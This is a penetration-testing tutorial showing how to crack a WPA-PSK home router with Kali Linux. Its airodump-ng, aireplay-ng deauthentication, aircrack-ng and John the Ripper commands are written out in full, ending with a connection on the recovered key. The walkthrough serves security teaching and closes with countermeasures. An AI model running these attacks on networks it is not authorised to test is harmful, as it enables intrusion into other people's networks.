Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-PSK

By Tony Lee

Introduction

In our previous article we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network to showcase the abilities of this inexpensive and flexible setup.  In this article we will continue to test our setup by attacking our home router running WPA (Pre-Shared Key) PSK--walking you through the attack from start to finish.

Figure 1:  Our setup

Consult our previous article  for the following topics as they are omitted from this article due to similarity:

• Equipment
• Hardware
• Software
• Tips and tricks
• Version of Workstation
• Screen Resolution
• Simple Text Editor
• Connecting the USB Device

Outline

• Preparation
• Discovery (Kismet)
• Attack
• Explained
• Setting the Variables
• Capture the Handshake
• Deauthenticate the Client
• Brute-force the Key
• Connect
• Countermeasures
• Conclusion

Preparation

NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks.  To prevent any interference, we will disable it ahead of time.

root@kali:~# service network-manager stop [ ok ] Stopping network connection manager: NetworkManager.

Discovery (kismet)

In the previous article, we mentioned that the simplest way to ensure that the wireless card is working is to do some light discovery.  After all, the first step in a wireless engagement is to identify targets of interest.  The iwlist command works great for this as you can stay in “Managed” mode as shown in the iwconfig command in the previous article.

root@kali:~# iwlist wlan0 scanning wlan0     Scan completed :          Cell 01 - Address: 00:7F:28:xx:xx:xx                    Channel:6                    Frequency:2.437 GHz (Channel 6)                    Quality=37/70  Signal level=-73 dBm                      Encryption key:on                    ESSID:"xxxxxxThexxxxx"                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s                              9 Mb/s; 12 Mb/s; 18 Mb/s                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s                    Mode:Master --snip--                    IE: IEEE 802.11i/WPA2 Version 1                        Group Cipher : CCMP                        Pairwise Ciphers (1) : CCMP                        Authentication Suites (1) : PSK                    IE: WPA Version 1                        Group Cipher : CCMP --snip--

For more advanced discovery and tracking, we want to place the wireless card into “Monitor” mode.  We could do this manually with airmon-ng as we did in our previous article; however let’s use Kismet for our discovery this time using the following syntax:

root@kali:~# kismet -c wlan0

Figure 2:  Kismet is detecting wireless networks

Did you notice that we used wlan0 in the Kismet syntax above?  Doesn’t Kismet need the wireless card in monitor mode in order for it to work properly?  Sure does, but it handles that in the background:

Running iwconfig shows that Kismet created a monitor mode interface called wlan0mon:

root@kali:~# iwconfig wlan0mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.422 GHz  Tx-Power=20 dBm             Retry  long limit:7   RTS thr:off   Fragment thr:off          Power Management:off           wlan0     IEEE 802.11bgn  ESSID:off/any            Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm             Retry  long limit:7   RTS thr:off   Fragment thr:off          Encryption key:off          Power Management:off           lo        no wireless extensions. eth0      no wireless extensions.

Since Kismet is detecting networks correctly, we can use this for our target discovery… but first a little cleanup to the default Kismet user interface (UI).

• Get rid of the packet graph
• Stop the auto-sort
• List the clients

While the packet graph looks cool, it does not help us in this task, so we disable it by clicking on View -> Packet Graph.

Also, since we want to focus on one network, we don’t want it to Auto-sort.  This can be disabled by clicking on Sort -> SSID.

Lastly, since a victim is necessary for the WPA-PSK attack, enable viewing of clients by clicking View -> Client List.

We will need to note the same information to what we had in the previous article:

• Name of the wireless network (ESSID)
• MAC address of the AP (BSSID)
• Channel that the AP is sitting on
• MAC address of a wireless client

Figure 3:  Kismet provides enough victim information to proceed with the attack

We can now shutdown Kismet and begin the attack.

Attack

Now that discovery is complete, we should have enough information to attack the victim Access Point (AP) to further prove that this wireless card is worth having in our toolkit.  But what attack are we performing and why does it work?

Explained

In the previous article, we cracked a WEP key.  The process is a bit different for cracking WPA-PSK.

“Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.”

Source:  http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Even with the warning above to avoid dictionary based and short pre-shared keys, we still see it quite often.  Let’s take a look at the attack.

Setting the Variables

In our example, the victim information is summarized below:

Variable name = Description:  Value ============================== $ESSID = ESSID:  QX3A7 $CH = Channel:  6 $AP = AP MAC: 30:46:9A:16:ED:CE $VM = Victim user MAC:  24:77:03:8C:D3:44

Since this is a good amount of information that can be easily mistyped (one number off on a MAC address), we use shell variables when attacking wireless networks.

It is good practice to open 2-3 windows and copy the following into each window to set the variables:

export ESSID=QX3A7 export CH=6 export AP=30:46:9A:16:ED:CE export VM=24:77:03:8C:D3:44

The layout shown in the screenshot below is our personal preference, but we find it quite useful.  We will monitor/capture in the top window, perform active attacks against the AP/client in the middle window, and use the bottom window for cracking the crypto key.

Figure 4:  The screenshot above shows the variables being set in a few shell windows--this is for convenience

Now that we have our windows set up and environment variables set to our victim, let’s begin the attack.  If you want to change your MAC address for extra stealth, now is the time to do so.

Capture the Handshake

We begin by capturing the traffic in an attempt to capture the 4-way handshake.  This is a convenient way to start because it also locks us on to the channel of the AP of interest (in this example, channel 6).

Syntax: airodump-ng -c <CHANNEL> --bssid  <APMAC> -w <FILE PREFIX> <INT> Key: -c = Channel that the AP is on --bssid = MAC address of the AP -w = Prefix of the file name that you want to write data to <INT> = Interface we will be capturing on Attack: airodump-ng -c $CH --bssid  $AP -w WPAcapture mon0

Deauthenticate the Client

The goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network.  Upon client reauthentication, we can capture their 4-way handshake.

Syntax: aireplay-ng -0 25 -a <AP> -c < VICTIM_MAC> <INT> Key: -0 = (same as --deauth) deauthentication attack -a = MAC address of the AP -c = Victim MAC address <INT> = Interface we will be attacking from Attack: aireplay-ng -0 25 -a $AP -c $VM mon0

When you are watching your attack take place, keep an eye on the top right-hand corner of the capture window.  The following message should appear when you have successfully captured the 4-way handshake:  “WPA handshake:  XX:XX:XX:XX:XX:XX” (where X’s are the MAC address (BSSID) of the AP you are interested in).  Feel free to stop the capture process with Control+c after the handshake is captured. The screenshot below shows the attack windows and a successfully captured WPA handshake.

Figure 5:  The attack is under way

Brute-force the Key

Now it is time to run aircrack-ng against the pcap file which contains the handshake.

Since this is an off-line brute-force attack, you will need a sufficiently large wordlist to supply to aircrack-ng.  The rockyou.com word list is a good start as it is almost 14.5 million passwords.  In order to use the rockyou.com wordlist, you will have to uncompress it as shown below:

root@kali:/usr/share/wordlists# ls rockyou.txt.gz root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz root@kali:/usr/share/wordlists# ls rockyou.txt root@kali:/usr/share/wordlists# wc -l rockyou.txt 14344392 rockyou.txt

After uncompressing the wordlist, run aircrack-ng as shown below:

Syntax: aircrack-ng -w <WORDLIST> <PCAP> Key: -w = wordlist Attack: root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt WPAcapture-01.cap

Figure 6:  Brute-forcing takes time…

Eventually, if all goes well, the key will be found.  Our Kali VM (virtual CPU only) is checking passwords at about 737.75 passwords / second.  There are 14,344,392 passwords in the rockyou.com list.  Simple math shows that the entire list can be exhausted in 14,344,392 / 738 ≈ 19,436 seconds or 19.436/60 ≈ 324 minutes or 324/60 ≈ 5.4 hours.  Fortunately our password of “cheekymonkeyrox” was not at the end of list and it cracked in 22 minutes and 55 seconds.

Figure 7:  Key is finally cracked

For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

Generate permutations with JTR: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout Feed JTR permutations into aircrack-ng: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | aircrack-ng -w - -e <ESSID> <PCAP> Example: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | aircrack-ng -w - -e QX3A7 WPAcapture-01.cap

Connect

Now that we have recovered the key, we will connect to the AP using the command line steps outlined below:

Check the status of the card: root@kali:~#  iwconfig wlan0 Enter the network information: root@kali:~# iwconfig wlan0 essid "QX3A7" Bring the Interface up: root@kali:~# ifconfig wlan0 up Create wpa_supplicant file named wpa-psk.conf  with your favorite text editor: network={    ssid="QX3A7"    key_mgmt=WPA-PSK    group=CCMP    pairwise=CCMP    proto=WPA2    psk=" cheekymonkeyrox" } Run the wpa_supplicant: root@kali:~# wpa_supplicant -i wlan0 -c ~/wpa-psk.conf Obtain an IP: root@kali:~# dhclient wlan0 Reloading /etc/samba/smb.conf: smbd only. Verify an IP is obtained: root@kali:~# ifconfig wlan0

Figure 9:  Connecting to the WPA-PSK using wpa_supplicant

Countermeasures

Even though the intention of this article is not to warn about the dangers of using WPA-PSK security, we feel that it is important to note that WPA-PSK should be used sparingly and with great caution in an enterprise environment.  That said, we perform many wireless assessments in which we discover that the clients are using WPA-PSK in certain circumstances (usually required for hand scanners or some other one-off devices).  For these special cases, we recommend the following (in order from most secure to least):

• Turn off the network if it is no longer needed
• Air gap the wireless network from the corporate network
• Only use REALLY long and complex passwords - change frequently if possible
• Segment the wireless network from the wired network via Firewall and IPS

Conclusion

In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-PSK test network.  For just $16 and no reboot required you can place a wireless adapter into monitor mode and start assessing wireless networks.  More testing needs to be done with this setup to determine other capabilities; however as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing.  Feedback below is always appreciated.

If you try this with different cards and run into issues, check the following excellent resource:  http://docs.kali.org/troubleshooting/troubleshooting-wireless-driver-issues

Special Thanks

Dan Dumond